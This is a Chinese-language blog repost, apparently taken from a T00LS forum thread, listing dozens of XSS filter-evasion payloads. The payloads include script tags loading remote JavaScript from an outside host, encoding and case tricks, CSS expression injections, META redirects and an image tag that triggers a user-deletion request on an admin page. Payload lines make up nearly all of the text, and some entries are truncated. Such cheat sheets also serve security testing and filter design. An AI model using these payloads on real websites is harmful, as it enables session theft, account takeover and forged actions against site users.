XSS攻击简介

XSS攻击手法汇总

普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

IMG标签XSS使用JavaScript命令

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

IMG标签无分号无引号

 <IMG SRC=javascript:alert(‘XSS’)>

IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

HTML编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

修正缺陷IMG标签

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

formCharCode标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S')>

7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S')>

十六进制编码也是没有分号(计算器)

<IMG SRC=java..省略..XSS')>

嵌入式标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式编码标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式换行符

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式回车

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC=”javascript:alert(‘XSS‘)”>

解决限制字符(要求同页面)

<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

空字符12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

Spaces和meta前的IMG标签

<IMG SRC=” javascript:alert(‘XSS’);”>

Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

双开括号

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

无结束脚本标记2

<SCRIPT SRC=//3w.org/XSS/xss.js>

半开的HTML/JavaScript XSS

<IMG SRC=”javascript:alert(‘XSS’)”

双开角括号

<iframe src=http://3w.org/XSS.html <

无单引号 双引号 分号

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

换码过滤的JavaScript

\”;alert(‘XSS’);//

结束Title标签

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

Input Image

<INPUT SRC=”javascript:alert(‘XSS’);”>

BODY Image

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

BODY标签

<BODY(‘XSS’)>

IMG Dynsrc

<IMG DYNSRC=”javascript:alert(‘XSS’)”>

IMG Lowsrc

<IMG LOWSRC=”javascript:alert(‘XSS’)”>

BGSOUND

<BGSOUND SRC=”javascript:alert(‘XSS’);”>

STYLE sheet

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

远程样式表

<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

List-style-image(列表式)

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

IMG VBscript

<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

META链接url

<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>

Iframe

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

Frame

<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6

Table

<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

TD

<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

DIV background-image

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

DIV background-image后加上额外字符

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

DIV expression

<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

STYLE属性分拆表达

<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

匿名STYLE(组成:开角号和一个字母开头)

<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

STYLE background-image

<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
CLASS=XSS></A>

IMG STYLE方式

exppression(alert(“XSS”))’>

STYLE background

<STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

BASE

<BASE HREF=”javascript:alert(‘XSS’);//”>

EMBED标签,你可以嵌入FLASH,其中包涵XSS

<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>

在flash中使用ActionScrpt可以混进你XSS的代码

a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);

XML namespace.HTC文件必须和你的XSS载体在一台服务器上

<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
</HTML>

如果过滤了你的JS你可以在图片里添加JS代码来利用

<SCRIPT SRC=””></SCRIPT>

IMG嵌入式命令,可执行任意命令

<IMG SRC=”http://www.XXX.com/a.php?a=b”>

IMG嵌入式命令(a.jpg在同服务器)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

绕符号过滤

<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>

URL绕行

<A HREF=”http://127.0.0.1/”>XSS</A>

URL编码

<A HREF=”http://3w.org”>XSS</A>

IP十进制

<A HREF=”http://3232235521″>XSS</A>

IP十六进制

<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

IP八进制

<A HREF=”http://0300.0250.0000.0001″>XSS</A>

混合编码

<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>

节省[http:]

 <A HREF=”//www.google.com/”>XSS</A>

节省[www]

 <A HREF=”http://google.com/”>XSS</A>

绝对点绝对DNS

<A HREF=”http://www.google.com./”>XSS</A>

javascript链接

<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

转载于:https://my.oschina.net/crazyharry/blog/1105076

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值